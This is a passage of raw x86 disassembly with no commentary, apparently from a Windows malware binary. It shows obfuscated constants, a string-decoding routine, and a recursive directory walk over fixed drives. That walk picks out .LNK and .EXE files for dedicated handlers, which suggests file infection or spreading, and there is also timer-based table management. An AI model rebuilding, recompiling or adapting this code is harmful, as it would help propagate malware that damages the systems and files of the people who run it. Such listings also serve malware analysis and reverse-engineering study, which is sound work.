cmp eax, esi
jz short loc_43C852
mov [ebp+var_10059], 43h
loc_43C852: ; CODE XREF: sub_43C5EA+25F�j
push offset byte_44B183
call sub_43C507
movsx edi, word_44A1FC
sub edi, 4
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_4384B5
add esp, 10h
mov esi, dword_44A0DC
inc esi
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_43C88E: ; CODE XREF: sub_43C5EA+2BA�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_43C8A6
inc [ebp+var_10054]
jmp short loc_43C88E
; ---------------------------------------------------------------------------
loc_43C8A6: ; CODE XREF: sub_43C5EA+2B2�j
mov eax, [ebp+var_10054]
movsx edx, word_44A150
movsx ecx, word_44A1F0
add edx, ecx
sub edx, 0Bh
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_444054
mov [ebp+var_10080], eax
push offset dword_44B17C
call sub_43C507
movsx edi, word_44A22C
movsx esi, word_44A260
add edi, esi
sub edi, 8
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_4384B5
add esp, 14h
mov esi, dword_44A214
sub esi, 6
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_43C927: ; CODE XREF: sub_43C5EA+353�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_43C93F
inc [ebp+var_10054]
jmp short loc_43C927
; ---------------------------------------------------------------------------
loc_43C93F: ; CODE XREF: sub_43C5EA+34B�j
mov eax, [ebp+var_10054]
mov edx, dword_44A238
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_444054
pop ecx
mov [ebp+var_10060], eax
movsx eax, word_44A118
sub eax, 3
cmp [ebp+var_10080], eax
ja short loc_43C9EC
movsx eax, word_44A22C
add eax, dword_44A26C
sub eax, 10h
mov [ebp+var_1004C], eax
jmp short loc_43C9D8
; ---------------------------------------------------------------------------
loc_43C997: ; CODE XREF: sub_43C5EA+400�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp ds:dword_445130[esi], 0
jz short loc_43C9D2
mov edx, [ebp+var_10060]
cmp ds:dword_444060[esi], edx
jnz short loc_43C9D2
mov dl, ds:byte_446200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_43C9D2
and ds:dword_445130[edi*4], 0
loc_43C9D2: ; CODE XREF: sub_43C5EA+3C0�j
; sub_43C5EA+3CF�j ...
inc [ebp+var_1004C]
loc_43C9D8: ; CODE XREF: sub_43C5EA+3AB�j
movsx eax, word_44A178
add eax, 3E4h
cmp [ebp+var_1004C], eax
jb short loc_43C997
loc_43C9EC: ; CODE XREF: sub_43C5EA+393�j
call ds:dword_449770 ; GetTickCount
mov [ebp+var_10064], eax
mov eax, dword_44A280
sub eax, 4
mov [ebp+var_10050], eax
jmp short loc_43CA59
; ---------------------------------------------------------------------------
loc_43CA08: ; CODE XREF: sub_43C5EA+47F�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp ds:dword_445130[edi], 0
jz short loc_43CA53
mov edi, ds:dword_448660[edi]
movsx esi, word_44A104
add esi, 0EA58h
mov edx, dword_44A134
sub edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_43CA53
mov edi, [ebp+var_10050]
and ds:dword_445130[edi*4], 0
loc_43CA53: ; CODE XREF: sub_43C5EA+42F�j
; sub_43C5EA+459�j
inc [ebp+var_10050]
loc_43CA59: ; CODE XREF: sub_43C5EA+41C�j
mov eax, dword_44A200
add eax, 3E3h
cmp [ebp+var_10050], eax
jb short loc_43CA08
movsx eax, word_44A264
movsx edx, word_44A180
add eax, edx
sub eax, 0Dh
mov [ebp+var_10058], eax
jmp short loc_43CA9C
; ---------------------------------------------------------------------------
loc_43CA86: ; CODE XREF: sub_43C5EA+4C2�j
mov edi, [ebp+var_10058]
cmp ds:dword_445130[edi*4], 0
jz short loc_43CAAE
inc [ebp+var_10058]
loc_43CA9C: ; CODE XREF: sub_43C5EA+49A�j
mov eax, dword_44A20C
add eax, 3E2h
cmp [ebp+var_10058], eax
jb short loc_43CA86
loc_43CAAE: ; CODE XREF: sub_43C5EA+4AA�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:dword_444060[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:byte_446200[eax], dl
movsx eax, word_44A100
sub eax, 3
cmp [ebp+var_10080], eax
jbe loc_43CB83
movsx esi, word_44A0B0
add esi, 0FFF8h
mov ds:word_446A50[edi*2], si
mov eax, dword_44A204
dec eax
mov [ebp+var_10088], eax
jmp short loc_43CB66
; ---------------------------------------------------------------------------
loc_43CB09: ; CODE XREF: sub_43C5EA+595�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp ds:dword_445130[esi], 0
jz short loc_43CB60
movzx edx, ds:word_446A50[edi*2]
mov ecx, dword_44A284
add ecx, 0FFF6h
cmp edx, ecx
jz short loc_43CB60
mov edx, [ebp+var_10060]
cmp ds:dword_444060[esi], edx
jnz short loc_43CB60
mov dl, ds:byte_446200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_43CB60
lea edi, ds:446A50h[edi*2]
inc word ptr [edi]
jmp short loc_43CB9A
; ---------------------------------------------------------------------------
loc_43CB60: ; CODE XREF: sub_43C5EA+532�j
; sub_43C5EA+54A�j ...
inc [ebp+var_10088]
loc_43CB66: ; CODE XREF: sub_43C5EA+51D�j
mov eax, dword_44A1F4
add eax, 3DEh
movsx edx, word_44A230
add eax, edx
cmp [ebp+var_10088], eax
jb short loc_43CB09
jmp short loc_43CB9A
; ---------------------------------------------------------------------------
loc_43CB83: ; CODE XREF: sub_43C5EA+4F6�j
mov edi, [ebp+var_10058]
mov esi, dword_44A284
sub esi, 8
mov ds:word_446A50[edi*2], si
loc_43CB9A: ; CODE XREF: sub_43C5EA+574�j
; sub_43C5EA+597�j
call ds:dword_449770 ; GetTickCount
mov edi, [ebp+var_10058]
mov ds:dword_448660[edi*4], eax
lea esi, off_44A354
mov ds:dword_445130[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:445130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:445130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call ds:dword_449BB0
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43CC33: ; CODE XREF: sub_43C5EA+158�j
; sub_43C5EA+165�j ...
cmp [ebp+var_10048], 0
jz short loc_43CC48
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43CC48: ; CODE XREF: sub_43C5EA+650�j
cmp [ebp+var_4], 0
jz short loc_43CC57
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43CC57: ; CODE XREF: sub_43C5EA+11B�j
; sub_43C5EA+662�j
inc [ebp+var_1C]
loc_43CC5A: ; CODE XREF: sub_43C5EA+CD�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_43C6BC
loc_43CC66: ; CODE XREF: sub_43C5EA+B6�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43CC6F: ; CODE XREF: sub_43C5EA+8E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_43CC7A: ; CODE XREF: sub_43C5EA+5F�j
; sub_43C5EA+1E6�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C5EA endp
; =============== S U B R O U T I N E =======================================
sub_43CC7F proc near ; DATA XREF: .data:0044A380�o
mov eax, 80004001h
retn 8
sub_43CC7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CC87 proc near ; CODE XREF: sub_440F46+346�p
; sub_440F46+440�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, dword_44A1CC
sub edi, 6
cmp edx, edi
jnz short loc_43CCAB
mov eax, [ebp+arg_0]
jmp short loc_43CCC5
; ---------------------------------------------------------------------------
loc_43CCAB: ; CODE XREF: sub_43CC87+1D�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_43CCC5: ; CODE XREF: sub_43CC87+22�j
pop edi
pop esi
leave
retn
sub_43CC87 endp
; =============== S U B R O U T I N E =======================================
sub_43CCC9 proc near ; CODE XREF: sub_440511+259�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
mov eax, dword_44A154
movsx edx, word_44A098
add eax, edx
sub eax, 2
cmp ecx, eax
jge short loc_43CD1F
mov eax, dword_44A0C4
movsx edx, word_44A1F0
add eax, edx
sub eax, 5
imul ecx, eax
mov eax, dword_44A09C
sub eax, 4
mov edx, esi
add edx, eax
movsx eax, word_44A27C
add eax, dword_44A15C
sub eax, 9
imul edx, eax
sub ecx, edx
jmp loc_43CE5C
; ---------------------------------------------------------------------------
loc_43CD1F: ; CODE XREF: sub_43CCC9+1A�j
dec ecx
mov eax, dword_44A09C
add eax, 0Eh
add eax, dword_44A0AC
cmp ecx, eax
jge short loc_43CD5F
movsx eax, word_44A1E0
add eax, dword_44A0AC
sub eax, 2
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, dword_44A1BC
inc edx
add edx, dword_44A1A0
mov ecx, eax
sub ecx, edx
jmp loc_43CE5C
; ---------------------------------------------------------------------------
loc_43CD5F: ; CODE XREF: sub_43CCC9+67�j
dec ecx
movsx eax, word_44A0E0
mov edx, dword_44A14C
lea eax, [eax+edx+1Bh]
cmp ecx, eax
jge short loc_43CD97
movsx eax, word_44A0A4
add eax, dword_44A234
sub eax, 7
imul ecx, eax
mov eax, dword_44A158
add eax, 39h
sub ecx, eax
jmp loc_43CE5C
; ---------------------------------------------------------------------------
loc_43CD97: ; CODE XREF: sub_43CCC9+AA�j
dec ecx
mov eax, dword_44A154
add eax, 1Dh
cmp ecx, eax
jge short loc_43CDC4
movsx eax, word_44A16C
inc eax
imul ecx, eax
mov eax, dword_44A0C4
add eax, 39h
add eax, dword_44A0D4
sub ecx, eax
jmp loc_43CE5C
; ---------------------------------------------------------------------------
loc_43CDC4: ; CODE XREF: sub_43CCC9+D9�j
dec ecx
movsx eax, word_44A1E0
mov edx, dword_44A0B4
lea eax, [eax+edx+21h]
cmp ecx, eax
jge short loc_43CE02
movsx eax, word_44A264
add eax, dword_44A114
sub eax, 0Fh
imul ecx, eax
movsx eax, word_44A174
mov edx, dword_44A138
lea eax, [eax+edx+4Dh]
sub ecx, eax
jmp short loc_43CE5C
; ---------------------------------------------------------------------------
loc_43CE02: ; CODE XREF: sub_43CCC9+10F�j
dec ecx
mov eax, dword_44A1EC
add eax, 2Eh
cmp ecx, eax
jge short loc_43CE28
mov eax, dword_44A10C
sub eax, 4
imul ecx, eax
movsx eax, word_44A0B0
add eax, 63h
sub ecx, eax
jmp short loc_43CE5C
; ---------------------------------------------------------------------------
loc_43CE28: ; CODE XREF: sub_43CCC9+144�j
dec ecx
mov eax, dword_44A198
add eax, 37h
cmp ecx, eax
jge short loc_43CE4C
mov eax, dword_44A11C
sub eax, 3
imul ecx, eax
mov eax, dword_44A17C
add eax, 6Bh
sub ecx, eax
jmp short loc_43CE5C
; ---------------------------------------------------------------------------
loc_43CE4C: ; CODE XREF: sub_43CCC9+16A�j
mov eax, dword_44A18C
add eax, 34h
add eax, dword_44A120
sub ecx, eax
loc_43CE5C: ; CODE XREF: sub_43CCC9+51�j
; sub_43CCC9+91�j ...
mov eax, ecx
pop esi
retn
sub_43CCC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CE60 proc near ; DATA XREF: .data:0044A3A0�o
push ebp
mov ebp, esp
movsx eax, word_44A1C0
sub eax, 4
cmp ds:dword_446608, eax
jbe short loc_43CE80
push offset dword_446608
call ds:dword_444010 ; InterlockedDecrement
loc_43CE80: ; CODE XREF: sub_43CE60+13�j
mov eax, ds:dword_446608
pop ebp
retn 4
sub_43CE60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CE89 proc near ; DATA XREF: .data:0044A36C�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44A22C
add eax, 3
cmp ds:dword_446620, eax
jnb short loc_43CEB9
mov eax, dword_44A258
sub eax, 2
mov ds:dword_446620, eax
loc_43CEB9: ; CODE XREF: sub_43CE89+21�j
mov eax, dword_44A280
mov edi, eax
add edi, dword_44A210
sub edi, 5
jmp short loc_43CED7
; ---------------------------------------------------------------------------
loc_43CECB: ; CODE XREF: sub_43CE89+5A�j
lea ebx, ds:445130h[edi*4]
cmp esi, ebx
jz short loc_43CEE5
inc edi
loc_43CED7: ; CODE XREF: sub_43CE89+40�j
mov eax, dword_44A0F4
add eax, 3E1h
cmp edi, eax
jb short loc_43CECB
loc_43CEE5: ; CODE XREF: sub_43CE89+4B�j
mov eax, dword_44A094
add eax, 3DCh
movsx edx, word_44A230
add eax, edx
cmp edi, eax
jnz short loc_43CF03
xor eax, eax
jmp loc_43D051
; ---------------------------------------------------------------------------
loc_43CF03: ; CODE XREF: sub_43CE89+71�j
movzx esi, ds:word_446A50[edi*2]
mov ebx, dword_44A0AC
movsx edx, word_44A27C
add ebx, edx
sub ebx, 4
cmp esi, ebx
jnz short loc_43CF48
movzx eax, ds:byte_446200[edi]
push eax
push ds:dword_444060[edi*4]
call sub_44243E
add esp, 8
and ds:dword_445130[edi*4], 0
xor eax, eax
jmp loc_43D051
; ---------------------------------------------------------------------------
loc_43CF48: ; CODE XREF: sub_43CE89+96�j
movzx esi, ds:word_446A50[edi*2]
mov ebx, dword_44A15C
add ebx, 0FFF6h
cmp esi, ebx
jnz loc_43D02F
mov eax, dword_44A110
movsx edx, word_44A0D8
add eax, edx
sub eax, 7
mov [ebp+var_4], eax
jmp loc_43D018
; ---------------------------------------------------------------------------
loc_43CF7D: ; CODE XREF: sub_43CE89+19C�j
mov esi, [ebp+var_4]
mov ebx, esi
shl ebx, 2
cmp ds:dword_445130[ebx], 0
jz loc_43D015
movzx edx, ds:word_446A50[esi*2]
movsx ecx, word_44A0C0
add ecx, 0FFFDh
cmp edx, ecx
jz short loc_43D015
mov edx, ds:dword_444060[edi*4]
cmp ds:dword_444060[ebx], edx
jnz short loc_43D015
mov bl, ds:byte_446200[esi]
cmp bl, ds:byte_446200[edi]
jnz short loc_43D015
movzx esi, ds:word_446A50[esi*2]
mov ebx, dword_44A09C
sub ebx, 4
cmp esi, ebx
jnz short loc_43D006
mov esi, [ebp+var_4]
movzx ebx, ds:byte_446200[esi]
push ebx
push ds:dword_444060[esi*4]
call sub_44243E
add esp, 8
and ds:dword_445130[edi*4], 0
jmp short loc_43D02B
; ---------------------------------------------------------------------------
loc_43D006: ; CODE XREF: sub_43CE89+156�j
mov esi, [ebp+var_4]
lea esi, ds:446A50h[esi*2]
dec word ptr [esi]
jmp short loc_43D02B
; ---------------------------------------------------------------------------
loc_43D015: ; CODE XREF: sub_43CE89+104�j
; sub_43CE89+121�j ...
inc [ebp+var_4]
loc_43D018: ; CODE XREF: sub_43CE89+EF�j
mov eax, dword_44A28C
add eax, 3E2h
cmp [ebp+var_4], eax
jb loc_43CF7D
loc_43D02B: ; CODE XREF: sub_43CE89+17B�j
; sub_43CE89+18A�j
xor eax, eax
jmp short loc_43D051
; ---------------------------------------------------------------------------
loc_43D02F: ; CODE XREF: sub_43CE89+D5�j
movzx esi, ds:word_446A50[edi*2]
mov ebx, dword_44A274
add ebx, dword_44A18C
cmp esi, ebx
jle short loc_43D04F
dec ds:word_446A50[edi*2]
loc_43D04F: ; CODE XREF: sub_43CE89+1BC�j
xor eax, eax
loc_43D051: ; CODE XREF: sub_43CE89+75�j
; sub_43CE89+BA�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43CE89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D058 proc near ; CODE XREF: sub_43B523+B8�p
; sub_43B622+1CD�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_442F6C
push ebx
push esi
push edi
mov edi, dword_44A288
movsx esi, word_44A160
add edi, esi
imul edi, 3C0h
sub edi, 12C0h
movsx esi, word_44A1C0
lea edi, [edi+esi+0EA5Ch]
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_442EF1
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
mov edx, dword_44A200
add edx, dword_44A0A0
sub edx, 8
cmp eax, edx
jnz short loc_43D0E2
push offset asc_44B171 ; "\a"
call sub_43C507
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_449634
add esp, 8
jmp loc_43D1F0
; ---------------------------------------------------------------------------
loc_43D0E2: ; CODE XREF: sub_43D058+65�j
call ds:dword_447228
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, dword_44A164
add edx, dword_44A0C4
sub edx, 9
cmp eax, edx
jnz short loc_43D15F
mov eax, dword_44A0F0
add eax, 6
add eax, dword_44A18C
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_440AF2
add esp, 0Ch
push offset asc_44B141 ; ","
call sub_43C507
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_449634
add esp, 10h
jmp loc_43D1F0
; ---------------------------------------------------------------------------
loc_43D15F: ; CODE XREF: sub_43D058+AD�j
mov eax, dword_44A194
sub eax, 9
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword_44A370
call sub_440AF2
add esp, 0Ch
push offset a_ ; "_"
call sub_43C507
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
movsx ebx, word_44A1DC
movsx edx, word_44A170
add ebx, edx
dec ebx
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
movsx esi, word_44A104
sub esi, 4
sub edi, esi
push edi
push offset dword_447230
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_449634
add esp, 34h
loc_43D1F0: ; CODE XREF: sub_43D058+85�j
; sub_43D058+102�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word_44A130
movsx edx, word_44A16C
add eax, edx
sub eax, 3
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, dword_44A21C
sub eax, 8
push eax
push 0
call ds:dword_449640 ; MultiByteToWideChar
push offset asc_44B0C4 ; "\t"
call sub_43F767
add esp, 4
push eax
call ds:dword_444044
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call ds:dword_444044
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call ds:dword_449BA0
push [ebp+var_EF30]
call ds:dword_449BA0
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_43D058 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D28C proc near ; CODE XREF: sub_43ABE3+B6�p
; sub_43ABE3+ED�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
mov edx, dword_44A280
sub edx, 4
cmp eax, edx
jnz short loc_43D2CA
mov eax, 65h
jmp loc_43D353
; ---------------------------------------------------------------------------
loc_43D2CA: ; CODE XREF: sub_43D28C+32�j
movzx eax, [ebp+arg_0]
movsx edx, word_44A0CC
sub edx, 6
cmp eax, edx
jnz short loc_43D2E3
mov eax, 79h
jmp short loc_43D353
; ---------------------------------------------------------------------------
loc_43D2E3: ; CODE XREF: sub_43D28C+4E�j
movzx eax, [ebp+arg_0]
mov edx, dword_44A20C
add edx, dword_44A120
sub edx, 9
cmp eax, edx
jnz short loc_43D301
mov eax, 75h
jmp short loc_43D353
; ---------------------------------------------------------------------------
loc_43D301: ; CODE XREF: sub_43D28C+6C�j
movzx eax, [ebp+arg_0]
mov edx, dword_44A1E4
add edx, dword_44A274
sub edx, 2
cmp eax, edx
jnz short loc_43D31F
mov eax, 69h
jmp short loc_43D353
; ---------------------------------------------------------------------------
loc_43D31F: ; CODE XREF: sub_43D28C+8A�j
movzx eax, [ebp+arg_0]
mov edx, dword_44A28C
add edx, dword_44A25C
sub edx, 0Ah
cmp eax, edx
jnz short loc_43D33D
mov eax, 6Fh
jmp short loc_43D353
; ---------------------------------------------------------------------------
loc_43D33D: ; CODE XREF: sub_43D28C+A8�j
movzx eax, [ebp+arg_0]
mov edx, dword_44A154
sub edx, 2
cmp eax, edx
jnz short loc_43D353
mov eax, 61h
loc_43D353: ; CODE XREF: sub_43D28C+39�j
; sub_43D28C+55�j ...
pop edi
pop ebx
leave
retn
sub_43D28C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D357 proc near ; CODE XREF: sub_43963B+3E�p
; sub_43D357+2D8�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_43D385
mov eax, dword_44A1E8
add eax, dword_44A0B8
sub eax, 4
mov [ebp+var_248], eax
jmp loc_43D415
; ---------------------------------------------------------------------------
loc_43D385: ; CODE XREF: sub_43D357+13�j
mov edx, [ebp+arg_4]
mov ecx, dword_44A1C4
add ecx, dword_44A1CC
sub ecx, 0Bh
cmp ds:dword_446630[edx*4], ecx
jnz short loc_43D3B6
push ebx
call ds:dword_44660C ; FindClose
mov eax, dword_44A1B8
sub eax, 4
push eax
call ds:dword_449664 ; ExitThread
loc_43D3B6: ; CODE XREF: sub_43D357+47�j
mov eax, dword_44A154
add eax, 5Dh
add eax, dword_44A18C
mov [ebp+var_248], eax
push offset byte_44B0B9
call sub_43C507
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call ds:dword_449634
add esp, 10h
lea eax, [ebp+var_252]
push eax
call ds:dword_449668 ; GetDriveTypeA
cmp eax, 3
jnz short loc_43D415
movsx eax, word_44A22C
movsx edx, word_44A144
lea eax, [eax+edx+11Fh]
mov [ebp+var_248], eax
loc_43D415: ; CODE XREF: sub_43D357+29�j
; sub_43D357+A1�j
xor edi, edi
inc edi
push offset word_44B0B2
call sub_43C507
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_449634
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43D439: ; CODE XREF: sub_43D357+E7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D439
movsx ecx, word_44A1DC
add ecx, 4
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43D4EF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D45D: ; CODE XREF: sub_43D357+10B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D45D
mov ecx, dword_44A128
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_444030
add esp, 4
cmp eax, 4Ch
jnz short loc_43D4EF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D489: ; CODE XREF: sub_43D357+137�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D489
mov edx, eax
mov ecx, dword_44A248
movsx eax, word_44A0BC
add ecx, eax
sub ecx, 6
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_444030
add esp, 4
cmp eax, 4Eh
jnz short loc_43D4EF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D4BE: ; CODE XREF: sub_43D357+16C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D4BE
movsx ecx, word_44A150
sub ecx, 6
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_444030
add esp, 4
cmp eax, 4Bh
jnz short loc_43D4EF
push esi
call sub_43BD90
add esp, 4
loc_43D4EF: ; CODE XREF: sub_43D357+FB�j
; sub_43D357+12B�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43D4F4: ; CODE XREF: sub_43D357+1A2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D4F4
movsx ecx, word_44A0BC
add ecx, dword_44A1F4
sub ecx, 8
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43D5C2
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D51E: ; CODE XREF: sub_43D357+1CC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D51E
movsx ecx, word_44A0CC
add ecx, dword_44A1B0
sub ecx, 0Ah
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_444030
add esp, 4
cmp eax, 45h
jnz short loc_43D5C2
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D551: ; CODE XREF: sub_43D357+1FF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D551
mov ecx, dword_44A278
add ecx, dword_44A20C
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_444030
add esp, 4
cmp eax, 58h
jnz short loc_43D5C2
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D583: ; CODE XREF: sub_43D357+231�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D583
mov edx, eax
mov ecx, dword_44A134
movsx eax, word_44A250
add ecx, eax
sub ecx, 7
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_444030
add esp, 4
cmp eax, 45h
jnz short loc_43D5C2
push [ebp+var_248]
push esi
call sub_44029C
add esp, 8
loc_43D5C2: ; CODE XREF: sub_43D357+1BC�j
; sub_43D357+1F3�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_447258 ; FindFirstFileA
mov ebx, eax
movsx eax, word_44A22C
movsx edx, word_44A104
add eax, edx
sub eax, 0Eh
neg eax
cmp ebx, eax
jz loc_43D6AC
cmp [ebp+var_112], 2Eh
jz loc_43D6A8
push offset byte_44B0A9
call sub_43C507
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_449634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_43D357
add esp, 20h
jmp short loc_43D6A8
; ---------------------------------------------------------------------------
loc_43D639: ; CODE XREF: sub_43D357+353�j
lea eax, [ebp+var_13E]
push eax
push ebx
call ds:dword_445004 ; FindNextFileA
mov edi, eax
or edi, edi
jnz short loc_43D66A
mov eax, [ebp+var_248]
add eax, ds:dword_449638
push eax
call ds:dword_449630
pop ecx
push ebx
call ds:dword_44660C ; FindClose
jmp short loc_43D6AC
; ---------------------------------------------------------------------------
loc_43D66A: ; CODE XREF: sub_43D357+2F4�j
cmp [ebp+var_112], 2Eh
jz short loc_43D6A8
push offset dword_44B0A0
call sub_43C507
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_449634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_43D357
